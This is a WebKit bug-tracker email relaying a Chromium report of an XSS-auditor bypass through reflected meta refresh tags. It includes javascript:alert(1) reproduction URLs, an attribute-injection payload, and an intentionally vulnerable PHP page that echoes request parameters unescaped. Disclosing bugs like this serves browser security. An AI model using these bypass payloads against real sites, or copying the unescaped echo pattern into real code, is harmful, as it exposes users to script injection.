[Webkit-unassigned] [Bug 67091] New: XSS auditor bypass with http-equiv="refresh"
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Sat Aug 27 13:30:16 PDT 2011
https://bugs.webkit.org/show_bug.cgi?id=67091
Summary: XSS auditor bypass with http-equiv="refresh"
Product: WebKit
Version: 528+ (Nightly build)
Platform: Unspecified
OS/Version: Unspecified
Status: NEW
Severity: Normal
Priority: P2
Component: WebKit Misc.
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: abarth at webkit.org
CC: dbates at webkit.org
Blocks: 66579
http://code.google.com/p/chromium/issues/detail?id=94482
Reported by j.terh... at gmail.com, Today (4 hours ago)
VULNERABILITY DETAILS
A basic reflected XSS, using the <meta http-equiv="refresh" /> vector, is allowed by the XSS filter.
VERSION
Chrome Version: 13.0.782.215 m + stable
Operating System: Windows NT 5.1 build 2600 (Windows XP Home Edition Service Pack 3) i586
REPRODUCTION CASE
Place the attached php file in a web accessible directory of a php enabled apache server at http://<host>/xss.php and call:
http://<host>/xss.php?refresh=javascript:alert(1)
The alert is shown and no blocking message is posted to the console. However the call:
http://<host>/xss.php?body=%3Cscript%3Ealert(1)%3C/script%3E
_is_ blocked and the usual blocking message ("Refused to execute a JavaScript script. Source code of script found within request.") is posted to the console. See screenshots refresh.jpg and basic.jpg.
ADDITIONAL:
If line 4 of the php script is changed to:
echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />";
the filter will also miss the reflected XSS if called as follows:
http://<host>/xss.php?refresh=alert(1)
Also if line 4 is changed to:
echo "<meta http-equiv='refresh' {$_GET['refresh']} />";
and called using:
http://<host>/xss.php?refresh=content=%220;%20url=javascript:alert(1)%22
the XSS is also allowed. _However_ if line 4 is changed to:
echo "<meta {$_GET['refresh']} />";
and the call:
http://<host>/xss.php?refresh=http-equiv=%22refresh%22%20content=%220;%20url=javascript:alert(1)%22
is made, the filter WILL detect the XSS (see screenshot refresh2.jpg)
PHP Version: 5.3.5
Apache: Apache/2.2.17 (Win32) compiled with MSVC6
<html>
<?php
if( isset($_GET['refresh']) ) {
//echo "<meta http-equiv='refresh' content='0; url={$_GET['refresh']}' />";
echo "<meta http-equiv='refresh' {$_GET['refresh']} />";
//echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />";
}
?>
<body>
<?php
if( isset($_GET['body']) ) {
echo $_GET['body'];
}
?>
</body>
</html>
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list